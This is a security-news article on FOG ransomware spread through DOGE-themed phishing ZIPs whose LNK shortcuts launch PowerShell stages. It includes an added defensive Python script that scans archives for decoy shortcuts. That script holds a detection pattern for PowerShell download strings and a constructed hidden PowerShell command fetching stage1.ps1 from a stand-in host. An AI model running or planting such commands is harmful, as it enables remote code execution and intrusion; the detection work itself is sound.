
Cybercriminals Distribute FOG Ransomware Masquerading as DOGE in Phishing Emails


Cybercriminals are distributing the FOG ransomware family by disguising payloads as Department of Government Efficiency (DOGE) communications, leveraging both phishing emails and references to current U.S. government initiatives.

Security analysts at Trend Vision One have detected and blocked multiple samples of FOG ransomware, which are being propagated through compressed email attachments, specifically ZIP archives named “Pay Adjustment.zip” that contain malicious LNK shortcut files.

Sophisticated Attack Chain Exploiting Government-Related References

Between March 27 and April 2, at least nine distinct FOG ransomware variants were uploaded to VirusTotal, each exhibiting the “.flocked” file extension and accompanied by readme.txt ransom notes.

These notes frequently reference the DOGE program, an initiative in the public eye due to recent allegations involving insider assistance to cybercriminal groups.

The ransom note also prompts recipients to propagate the infection by executing an embedded payload distribution code.

Upon execution, the attack chain is initiated by the LNK file, which masquerades as a PDF document. The file triggers a PowerShell command, downloading and running a script dubbed “stage1.ps1.”

Figure: The LNK file disguised as a PDF file.

This multi-stage PowerShell script fetches additional malicious binaries such as a ransomware loader (cwiper.exe), privilege escalation tool (ktool.exe), and various data-harvesting PowerShell scripts (including lootsubmit.ps1 and trackerjacker.ps1).

Notably, these scripts exfiltrate sensitive system and network information to remote servers, attempt to determine the infected host’s geolocation, and even incorporate politically charged commentary within the script.
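The delivery stage above (a ZIP attachment carrying an LNK shortcut posed as a PDF that launches a PowerShell download) is something a mail gateway or triage script can check for before a user ever double-clicks. The following added example is not code from the article or from Trend Micro; it inspects an archive's members by content (the MS-SHLLINK header signature) rather than by name, flags document-extension decoys in front of `.lnk`, and pulls PowerShell-style indicator strings out of the shortcut. The member name `Pay Adjustment.pdf.lnk` and the embedded command line are constructed stand-ins, not the campaign's actual values.

```python
import io
import re
import zipfile

# First 20 bytes of every Shell Link (MS-SHLLINK): HeaderSize 0x4C followed by the
# LinkCLSID {00021401-0000-0000-C000-000000000046} in its on-disk byte order.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
# Lure-name pattern the campaign relies on: a document extension in front of .lnk.
DECOY_NAME = re.compile(r"\.(pdf|docx?|xlsx?|txt)\.lnk$", re.I)
# Strings that suggest a shortcut launches a PowerShell download-and-run stage.
INDICATORS = re.compile(
    r"powershell|-enc\w*|-w\s+hidden|\biwr\b|invoke-webrequest|\.ps1\b|https?://", re.I)

def is_lnk(data: bytes) -> bool:
    """Check the content, not the name: a renamed shortcut still carries the magic."""
    return data[:len(LNK_MAGIC)] == LNK_MAGIC

def lnk_indicators(data: bytes) -> list[str]:
    """Scan both UTF-16LE alignments (LNK strings are UTF-16LE) plus raw ASCII."""
    views = [data.decode("utf-16-le", errors="ignore"),
             data[1:].decode("utf-16-le", errors="ignore"),
             data.decode("latin-1")]
    return sorted({m.group(0).lower() for v in views for m in INDICATORS.finditer(v)})

def triage_zip(zip_bytes: bytes) -> list[dict]:
    """Return one finding per archive member that is (or claims to be) a shortcut."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            data = zf.read(info)
            if info.filename.lower().endswith(".lnk") or is_lnk(data):
                findings.append({
                    "member": info.filename,
                    "lnk_header": is_lnk(data),
                    "decoy_extension": bool(DECOY_NAME.search(info.filename)),
                    "indicators": lnk_indicators(data),
                })
    return findings

def build_sample_zip() -> bytes:
    """Constructed test input (hypothetical names and command, not a real sample)."""
    cmd = "powershell -w hidden -c iwr http://example.invalid/stage1.ps1"
    fake_lnk = LNK_MAGIC + b"\x00" * 56 + cmd.encode("utf-16-le")  # header + string
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Pay Adjustment.pdf.lnk", fake_lnk)  # decoy member (constructed)
        zf.writestr("notes.txt", "benign text member")   # must not be flagged
    return buf.getvalue()

if __name__ == "__main__":
    for finding in triage_zip(build_sample_zip()):
        print(finding)
```

A real LNK also stores its target and arguments in structured fields; the string scan here is deliberately format-agnostic so it still fires on shortcuts whose optional sections are malformed or padded to evade parsers.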

Campaign Delivers Multi-Stage Payloads via Phishing, Targeting Multiple Industries

The payload deployment process is technically sophisticated. The ransomware loader performs multiple sandbox checks, including validation of RAM, CPU count, and registry keys, terminating execution if it detects a virtualized analysis environment.

If the checks pass, the loader decrypts and executes the FOG ransomware binary using a specified key, drops a log file (dbgLog.sys) to monitor encryption activities, and presents ransom instructions to the victim.

Figure: The log file dbgLog.sys records encryption-related events.

A critical component, ktool.exe, exploits a vulnerability in the Intel Network Adapter Diagnostic Driver (iQVW64.sys), which is temporarily extracted to the system, to escalate privileges.

This allows the ransomware to gain higher system privileges and maximize impact.

Further investigation revealed additional tactics, including the use of QR codes directing victims to Monero cryptocurrency wallets, and updated MAC address resolution logic for enhanced victim tracking.

Victim sectors are widespread, with FOG ransomware impacting technology, education, manufacturing, transportation, and service industries.

Since June 2024, 173 ransomware detections have been attributed to FOG in Trend Vision One customer telemetry, with incidents peaking in February.

Security experts caution that the group behind FOG ransomware either belongs to the original operator set or comprises opportunistic actors repackaging the malware to exploit current governmental narratives and social engineering themes.

The use of DOGE-related references appears intended to increase credibility and incite urgency among recipients.

To defend against such threats, organizations are urged to monitor indicators of compromise, maintain updated offline backups, implement robust network segmentation, and rigorously patch software vulnerabilities.

Regular staff training on phishing awareness further reduces susceptibility to these sophisticated attack chains.

Enterprises are reminded that, despite the evolving tactics, the fundamental impact of ransomware, financial loss and operational disruption, remains severe.

Vigilance, automation of threat detection, and up-to-date defense strategies are essential in countering these advanced cyber threats.
